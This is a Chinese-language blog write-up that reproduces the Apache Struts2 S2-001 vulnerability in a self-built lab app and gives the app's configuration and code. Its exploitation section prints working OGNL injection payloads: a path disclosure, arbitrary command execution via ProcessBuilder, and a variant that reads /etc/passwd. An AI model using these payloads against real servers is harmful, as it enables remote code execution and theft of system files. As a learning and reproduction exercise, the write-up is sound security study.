Struts2Vuls之S2-001漏洞复现与简要分析

2018-03-28 阅读量:

× 文章目录

1. 漏洞摘要
2. 简要原理
3. 环境搭建
1. 3.0.1. 下载struts-2.0.1
2. 3.0.2. 创建web工程

4.0.1. POC:
4.0.2. EXP:

最近经历了几次面试，深觉在企业中，java安全是十分受重视的，于是打算对java安全进行深入学习，本系列是对Struts2的漏洞进行分析与复现，写的不好欢迎大家指出问题，本文所有源码与poc&exp：https://github.com/xishir/Struts2Vuls/tree/master/S2-001

漏洞摘要

官方链接：https://cwiki.apache.org/confluence/display/WW/S2-001
官方概述：Remote code exploit on form validation error
影响版本：Struts 2.0.0 - Struts 2.0.8
修复摘要：数据 re-display 时禁止执行 OGNL 表达式

简要原理

在默认配置下，如果用户所提交的表单出现验证错误，后端会对用户的输入进行解析处理，然后返回并显示处理结果。举个例子，当你提交的登录表单为username=xishir&password=%{1+1}时，后端验证登录失败后会返回登录界面并显示你的输入，这时password字段中的OGNL表达式已经被解析处理过了，所以会显示%{1+1}的解析结果2，从而可以构造payload进行RCE。

环境搭建

下载struts-2.0.1

地址：http://archive.apache.org/dist/struts/binaries/struts-2.0.1-all.zip

创建web工程

目录结构

这里我是用的是MyEclipse，创建一个web工程，然后将struts-2.0.1中的几个jar包导入并新建如下几个文件
web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
    <display-name>S2-001 Example</display-name>
    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <welcome-file-list>
        <welcome-file>index.jsp</welcome-file>
    </welcome-file-list>
</web-app>

index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<p>link: <a href="https://cwiki.apache.org/confluence/display/WW/S2-001">https://cwiki.apache.org/confluence/display/WW/S2-001</a></p>
<s:form action="login">
	<s:textfield name="username" label="username" />
	<s:textfield name="password" label="password" />
	<s:submit></s:submit>
</s:form>
</body>
</html>

welcome.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<p>Hello <s:property value="username"></s:property></p>
</body>
</html>

struts.xml

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
    "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"
    "http://struts.apache.org/dtds/struts-2.0.dtd">
<struts>
	<package name="S2-001" extends="struts-default">
		<action name="login" class="com.demo.action.LoginAction">
			<result name="success">welcome.jsp</result>
			<result name="error">index.jsp</result>
		</action>
	</package>
</struts>

com.demo.action.LoginAction.java

package com.demo.action;

import com.opensymphony.xwork2.ActionSupport;

public class LoginAction extends ActionSupport {
	private String username = null;
	private String password = null;

	public String getUsername() {
		return this.username;
	}

	public String getPassword() {
		return this.password;
	}

	public void setUsername(String username) {
		this.username = username;
	}

	public void setPassword(String password) {
		this.password = password;
	}

	public String execute() throws Exception {
		if ((this.username.isEmpty()) || (this.password.isEmpty())) {
			return "error";
		}
		if ((this.username.equalsIgnoreCase("admin"))
				&& (this.password.equals("admin"))) {
			return "success";
		}
		return "error";
	}
}

漏洞利用

POC:

1	username=xishir&password=%{1+1}

EXP:

获取tomcat执行路径：

1	%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取Web路径：

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

执行任意命令：

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

带参数的命令：new java.lang.String[]{"cat","/etc/passwd"}

参考链接

https://cwiki.apache.org/confluence/display/WW/S2-001
http://rickgray.me/review-struts2-remote-command-execution-vulnerabilities.html
https://github.com/vulhub/vulhub/tree/master/struts2/s2-001
https://chybeta.github.io/2018/02/06/【struts2-命令-代码执行漏洞分析系列】S2-001/